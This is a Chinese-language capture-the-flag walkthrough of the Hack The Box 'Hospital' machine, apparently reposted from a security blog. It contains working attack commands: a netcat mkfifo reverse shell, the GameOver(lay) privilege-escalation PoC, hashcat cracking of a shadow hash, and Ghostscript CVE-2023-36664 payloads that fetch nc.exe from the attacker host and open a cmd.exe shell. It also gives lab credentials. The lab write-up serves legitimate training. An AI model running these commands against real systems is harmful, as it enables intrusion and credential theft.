HTB : Hospital

admin 2024年11月4日10:33:07评论12 views字数 3583阅读11分56秒阅读模式

HTB : Hospital

Tags: Medium Date: 2023年11月24日 Status: Yes

HTB : Hospital
Hospital.png

Port Scanning

nmap --min-rate 10000-p-10.10.11.241

StartingNmap7.94SVN( https://nmap.org ) at 2023-11-2416:33 CST
Nmap scan report for10.10.11.241
Host is up (0.000045s latency).
Not shown:65527 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
8080/tcp open  http-proxy

Nmapdone:1 IP address (1 host up) scanned in20.04 seconds

Web Enumeration

访问443端口 是一个邮件后台

HTB : Hospital
Untitled

访问8080端口

HTB : Hospital
Untitled

存在弱口令 admin 123456

登录后有文件上传点

HTB : Hospital
Untitled

扫描目录 发现上传路径 /uploads

HTB : Hospital
Untitled

测试文件上传

发现上传 jpg文件可以 上传php文件就不可以 (访问不到)可以上传phar文件

https://github.com/flozz/p0wny-shell

将这个shell上传为.phar为后缀的文件 之后访问 执行命令反弹shell

rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|sh -2>&1|nc 10.10.16.69002>/tmp/f
HTB : Hospital
Untitled

找到数据库信息

define('DB_SERVER','localhost');
define('DB_USERNAME','root');
define('DB_PASSWORD','my$qls3rv1c3!');
define('DB_NAME','hospital');

进行提权 uname -a查看版本 5.19 google搜索ubuntu 5.19.0 exploit 发现存在本地权限提升漏洞

GameOverlay Vulnerability Impacts 40% of Ubuntu Workloads | Wiz Blog

【漏洞复现】CVE-2023-2640 Ubuntu本地权限提升-腾讯云开发者社区-腾讯云

Foothold (user.txt)

输入poc 发现存在漏洞

unshare -rm sh -"mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;"
&& u/python3 -'import os;os.setuid(0);os.system("id")'
HTB : Hospital
Untitled

exp如下

GitHub - g1vi/CVE-2023-2640-CVE-2023-32629: GameOver(lay) Ubuntu Privilege Escalation

HTB : Hospital
Untitled

发现并没有flag 应该是不在这一台机器里 翻一翻找找信息

在查看shadow文件的时候发现了 hash

HTB : Hospital
Untitled

复制下来爆破

drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:99999:7:::
hashcat hash.txt /usr/share/wordlists/rockyou.txt

破解出密码

得到一组凭据 drwilliams:qwe123!@#

HTB : Hospital
Untitled

登录443端口的webmail试试

HTB : Hospital
Untitled

进去发现一封邮件

DearLucy,

I wanted to remind you that the project for lighter, cheaper and
environmentally friendly needles is still ongoing 💉.You are the one in
charge of providing me with the designs for these so that I can take
them to the 3D printing department and start producing them right away.
Please make the design in an ".eps" file format so that it can be well
visualized with GhostScript.

Best regards,
ChrisBrown.
😃

亲爱的露西:
我想提醒你,这个项目是为了更轻、更便宜和。
环保针头仍在进行中的💉。
你是里面的那个。
负责为我提供这些的设计,这样我就可以。
把它们送到3D打印部门,立即开始生产。
请将设计制作成“.eps”文件格式,这样才能很好地使用。
使用GhostScript可视化。
诚挚的问候,。
克里斯·布朗。
😃

google搜索 ghostscript eps exploit

CVE-2023-36664: Command injection with Ghostscript PoC + exploit - vsociety

https://github.com/jakabakos/CVE-2023-36664-Ghostscript-command-injection

发送邮件 传附件 上传nc

python CVE_2023_36664_exploit.py --inject --payload "curl http://10.10.16.6:8888/nc.exe -o nc.exe"--filename file.eps
HTB : Hospital
Untitled

使用nc反弹shell

python CVE_2023_36664_exploit.py --inject --payload "nc.exe 10.10.16.6 4444 -e cmd.exe"--filename file.eps

获得user.txt

HTB : Hospital
Untitled

da196aafb7c6cfcd2d2655258ef61edc

Priv Escalation (root.txt)

在ghostscript.bat中发现账号密码 hospitaldrbrown:chr!$br0wn

@echo off
set filename=%~1
powershell -command"$p = convertto-securestring 'chr!$br0wn' -asplain -force;$c = new-object system.management.automation.pscredential('hospitaldrbrown', $p);Invoke-Command -ComputerName dc -Credential $c -ScriptBlock { cmd.exe /c "C:Program` Filesgsgs10.01.1bingswin64c.exe" -dNOSAFER "C:Usersdrbrown.HOSPITALDownloads%filename%" }"
rpcclient -"hospitaldrbrown"10.10.11.241

查询信息 发现Administrator 与 Guest内容共享

HTB : Hospital
Untitled

找到网站根目录 使用icacls命令查看权限 发现是nt权限 也就是说 我们在此处上传webshell 那么webshell的权限就是 system权限

HTB : Hospital
Untitled

上传webshell

curl http://10.10.16.6:8888/shell.phar -o shell.php
HTB : Hospital
Untitled

成功访问system权限的webshell

HTB : Hospital
Untitled

53ae2d315279a03158e59b381b79f799

原文始发于微信公众号(SSP安全研究):HTB : Hospital

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月4日10:33:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB : Hospitalhttp://cn-sec.com/archives/3349017.html

发表评论

匿名网友 填写信息